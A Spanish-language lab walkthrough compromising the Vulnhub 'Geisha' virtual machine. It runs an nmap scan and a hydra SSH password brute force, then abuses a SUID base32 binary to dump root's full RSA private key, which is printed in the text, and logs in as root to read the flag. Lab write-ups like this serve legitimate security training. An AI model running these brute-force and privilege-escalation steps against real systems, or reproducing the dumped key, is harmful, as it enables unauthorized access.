[VLN] Geisha

Hoy vamos a hackear la maquina de Vulnhub llamada Geisha. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/geisha-1,481/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@m0nique:~$ nmap -A -p- 192.168.112.133 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 10:33 CEST Nmap scan report for 192.168.112.133 Host is up (0.00050s latency). Not shown: 65527 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 1b:f2:5d:cd:89:13:f2:49:00:9f:8c:f9:eb:a2:a2:0c (RSA) | 256 31:5a:65:2e:ab:0f:59:ab:e0:33:3a:0c:fc:49:e0:5f (ECDSA) |_ 256 c6:a7:35:14:96:13:f8:de:1e:e2:bc:e7:c7:66:8b:ac (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Geisha 3389/tcp open http nginx 1.14.2 |_http-server-header: nginx/1.14.2 |_http-title: Seppuku 7080/tcp open ssl/http LiteSpeed httpd |_http-server-header: LiteSpeed |_http-title: Geisha | ssl-cert: Subject: commonName=geisha/organizationName=webadmin/countryName=US | Not valid before: 2020-05-09T14:01:34 |_Not valid after: 2022-05-09T14:01:34 |_ssl-date: 2020-05-25T08:34:13+00:00; 0s from scanner time. | tls-alpn: | h2 | spdy/3 | spdy/2 |_ http/1.1 7125/tcp open http nginx 1.17.10 |_http-server-header: nginx/1.17.10 |_http-title: Geisha 8088/tcp open http LiteSpeed httpd |_http-server-header: LiteSpeed |_http-title: Geisha 9198/tcp open http SimpleHTTPServer 0.6 (Python 2.7.16) |_http-server-header: SimpleHTTP/0.6 Python/2.7.16 |_http-title: Geisha Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 128.05 seconds
    Despues de mirar, no encontramos nada por donde continuar... Asi que hacemos bruteforce(ssh) al usuario geisha.
    sml@m0nique:~$ hydra -l geisha -P rockyou.txt 192.168.112.133 ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-25 10:35:48 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.112.133:22/ [STATUS] 165.00 tries/min, 165 tries in 00:01h, 14344239 to do in 1448:55h, 16 active [STATUS] 113.67 tries/min, 341 tries in 00:03h, 14344063 to do in 2103:15h, 16 active [22][ssh] host: 192.168.112.133 login: geisha password: letmein 1 of 1 target successfully completed, 1 valid password found tps://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-25 10:40:32
    Encontramos la password :) Nos logueamos como geisha.
  • Low Shell
  • sml@m0nique:~$ ssh geisha@192.168.112.133 The authenticity of host '192.168.112.133 (192.168.112.133)' can't be established. ECDSA key fingerprint is SHA256:VZJ2vD6+/BC5zd9v8nRSgqEHyfR17GuCELg0nE0BkFk. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.112.133' (ECDSA) to the list of known hosts. geisha@192.168.112.133's password: Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat May 9 11:56:59 2020 from 192.168.1.21 geisha@geisha:~$ id uid=1000(geisha) gid=1000(geisha) groups=1000(geisha),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev) ,109(netdev)
    Exploramos el sistema...
    geisha@geisha:~$ ls geisha@geisha:~$ ls -la total 20 drwxr-xr-x 2 geisha geisha 4096 May 25 04:30 . drwxr-xr-x 3 root root 4096 May 3 01:42 .. -rw-r--r-- 1 geisha geisha 220 May 3 01:42 .bash_logout -rw-r--r-- 1 geisha geisha 3526 May 3 01:42 .bashrc -rw-r--r-- 1 geisha geisha 807 May 3 01:42 .profile geisha@geisha:~$ find / -perm -4000 2>/dev/null /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/bin/newgrp /usr/bin/passwd /usr/bin/umount /usr/bin/su /usr/bin/chsh /usr/bin/base32 /usr/bin/sudo /usr/bin/gpasswd /usr/bin/chfn /usr/bin/mount
  • Privilege Escalation
  • Vemos que esta el binario base32 con SUID, el cual podemos utilizar para leer ficheros de root... Lo utilizamos para leer la key privada(ssh) de root.
    geisha@geisha:~$ base32 /root/.ssh/id_rsa | base32 -d -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA43eVw/8oSsnOSPCSyhVEnt01fIwy1YZUpEMPQ8pPkwX5uPh4 OZXrITY3JqYSCFcgJS34/TQkKLp7iG2WGmnno/Op4GchXEdSklwoGOKNA22l7pX5 89FAL1XSEBCtzlrCrksvfX08+y7tS/I8s41w4aC1TDd5o8c1Kx5lfwl7qw0ZMlbd 5yeAUhuxuvxo/KFqiUUfpcpoBf3oT2K97/bZr059VU8T4wd5LkCzKEKmK5ebWIB6 fgIfxyhEm/o3dl1lhegTtzC6PtlhuT7ty//mqEeMuipwH3ln61fHXs72LI/vTx26 TSSmzHo8zZt+/lwrgroh0ByXbCtDaZjo4HAFfQIDAQABAoIBAQCRXy/b3wpFIcww WW+2rvj3/q/cNU2XoQ4fHKx4yqcocz0xtbpAM0veIeQFU0VbBzOID2V9jQE+9k9U 1ZSEtQJRibwbqk1ryDlBSJxnqwIsGrtdS4Q/CpBWsCZcFgy+QMsC0RI8xPlgHpGR Y/LfXZmy2R6E4z9eKEYWlIqRMeJTYgqsP6ZR4SOLuZS1Aq/lq/v9jqGs/SQenjRb 8zt1BoqCfOp5TtY1NoBLqaPwmDt8+rlQt1IM+2aYmxdUkLFTcMpCGMADggggtnR+ 10pZkA6wM8/FlxyAFcNwt+H3xu5VKuQKdqTfh1EuO3c34UmuS1qnidHO1rYWOhYO jceQYzoBAoGBAP/Ml6cp2OWqrheJS9Pgnvz82n+s9yM5raKNnH57j0sbEp++eG7o 2po5/vrLBcCHGqZ7+RNFXDmRBEMToru/m2RikSVYk8QHLxVZJt5iB3tcxmglGJj/ cLkGM71JqjHX/edwu2nNu14m4l1JV9LGvvHR5m6uU5cQvdcMTsRpkuxdAoGBAOOl THxiQ6R6HkOt9w/WrKDIeGskIXj/P/79aB/2p17M6K+cy75OOYzqkDPENrxK8bub RaTzq4Zl2pAqxvsv/CHuJU/xHs9T3Ox7A1hWqnOOk2f0KBmhQTYBs2OKqXXZotHH xvkOgc0fqRm1QYlCK2lyBBM14O5Isud1ZZXLUOuhAoGBAIBds1z36xiV5nd5NsxE 1IQwf5XCvuK2dyQz3Gy8pNQT6eywMM+3mrv6jrJcX66WHhGd9QhurjFVTMY8fFWr edeOfzg2kzC0SjR0YMUIfKizjf2FYCqnRXIUYrKC3R3WPlx+fg5CZ9x/tukJfUEQ 65F+vBye7uPISvw3+O8n68shAoGABXMyppOvrONjkBk9Hfr0vRCvmVkPGBd8T71/ XayJC0L6myG02wSCajY/Z43eBZoBuY0ZGL7gr2IG3oa3ptHaRnGuIQDTzQDj/CFh zh6dDBEwxD9bKmnq5sEZq1tpfTHNrRoMUHAheWi1orDtNb0Izwh0woT6spm49sOf v/tTH6ECgYEA/tBeKSVGm0UxGrjpQmhW/9Po62JNz6ZBaTELm3paaxqGtA+0HD0M OuzD6TBG6zBF6jW8VLQfiQzIMEUcGa8iJXhI6bemiX6Te1PWC8NMMULhCjObMjCv bf+qz0sVYfPb95SQb4vvFjp5XDVdAdtQov7s7XmHyJbZ48r8ISHm98s= -----END RSA PRIVATE KEY----- geisha@geisha:~$ exit logout Connection to 192.168.112.133 closed.
    En nuestra maquina, copiamos la llave privada a un fichero.
    sml@m0nique:~$ echo "-----BEGIN RSA PRIVATE KEY----- > MIIEpQIBAAKCAQEA43eVw/8oSsnOSPCSyhVEnt01fIwy1YZUpEMPQ8pPkwX5uPh4 > OZXrITY3JqYSCFcgJS34/TQkKLp7iG2WGmnno/Op4GchXEdSklwoGOKNA22l7pX5 > 89FAL1XSEBCtzlrCrksvfX08+y7tS/I8s41w4aC1TDd5o8c1Kx5lfwl7qw0ZMlbd > 5yeAUhuxuvxo/KFqiUUfpcpoBf3oT2K97/bZr059VU8T4wd5LkCzKEKmK5ebWIB6 > fgIfxyhEm/o3dl1lhegTtzC6PtlhuT7ty//mqEeMuipwH3ln61fHXs72LI/vTx26 > TSSmzHo8zZt+/lwrgroh0ByXbCtDaZjo4HAFfQIDAQABAoIBAQCRXy/b3wpFIcww > WW+2rvj3/q/cNU2XoQ4fHKx4yqcocz0xtbpAM0veIeQFU0VbBzOID2V9jQE+9k9U > 1ZSEtQJRibwbqk1ryDlBSJxnqwIsGrtdS4Q/CpBWsCZcFgy+QMsC0RI8xPlgHpGR > Y/LfXZmy2R6E4z9eKEYWlIqRMeJTYgqsP6ZR4SOLuZS1Aq/lq/v9jqGs/SQenjRb > 8zt1BoqCfOp5TtY1NoBLqaPwmDt8+rlQt1IM+2aYmxdUkLFTcMpCGMADggggtnR+ > 10pZkA6wM8/FlxyAFcNwt+H3xu5VKuQKdqTfh1EuO3c34UmuS1qnidHO1rYWOhYO > jceQYzoBAoGBAP/Ml6cp2OWqrheJS9Pgnvz82n+s9yM5raKNnH57j0sbEp++eG7o > 2po5/vrLBcCHGqZ7+RNFXDmRBEMToru/m2RikSVYk8QHLxVZJt5iB3tcxmglGJj/ > cLkGM71JqjHX/edwu2nNu14m4l1JV9LGvvHR5m6uU5cQvdcMTsRpkuxdAoGBAOOl > THxiQ6R6HkOt9w/WrKDIeGskIXj/P/79aB/2p17M6K+cy75OOYzqkDPENrxK8bub > RaTzq4Zl2pAqxvsv/CHuJU/xHs9T3Ox7A1hWqnOOk2f0KBmhQTYBs2OKqXXZotHH > xvkOgc0fqRm1QYlCK2lyBBM14O5Isud1ZZXLUOuhAoGBAIBds1z36xiV5nd5NsxE > 1IQwf5XCvuK2dyQz3Gy8pNQT6eywMM+3mrv6jrJcX66WHhGd9QhurjFVTMY8fFWr > edeOfzg2kzC0SjR0YMUIfKizjf2FYCqnRXIUYrKC3R3WPlx+fg5CZ9x/tukJfUEQ > 65F+vBye7uPISvw3+O8n68shAoGABXMyppOvrONjkBk9Hfr0vRCvmVkPGBd8T71/ > XayJC0L6myG02wSCajY/Z43eBZoBuY0ZGL7gr2IG3oa3ptHaRnGuIQDTzQDj/CFh > zh6dDBEwxD9bKmnq5sEZq1tpfTHNrRoMUHAheWi1orDtNb0Izwh0woT6spm49sOf > v/tTH6ECgYEA/tBeKSVGm0UxGrjpQmhW/9Po62JNz6ZBaTELm3paaxqGtA+0HD0M > OuzD6TBG6zBF6jW8VLQfiQzIMEUcGa8iJXhI6bemiX6Te1PWC8NMMULhCjObMjCv > bf+qz0sVYfPb95SQb4vvFjp5XDVdAdtQov7s7XmHyJbZ48r8ISHm98s= > -----END RSA PRIVATE KEY-----" > loko
    Damos los permisos al fichero.
    sml@m0nique:~$ chmod 600 loko
    Y finalmente conectamos como root utilizando la key :)
    sml@m0nique:~$ ssh -i loko root@192.168.112.133 Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon May 25 04:46:15 2020 from 192.168.112.128 root@geisha:~# id uid=0(root) gid=0(root) groups=0(root)
  • flag.txt
  • root@geisha:~# ls flag.txt root@geisha:~# cat flag.txt Flag{Sun_CTF_220_5_G31sha}
  • End
  • Y con esto ya seriamos root de la maquina :)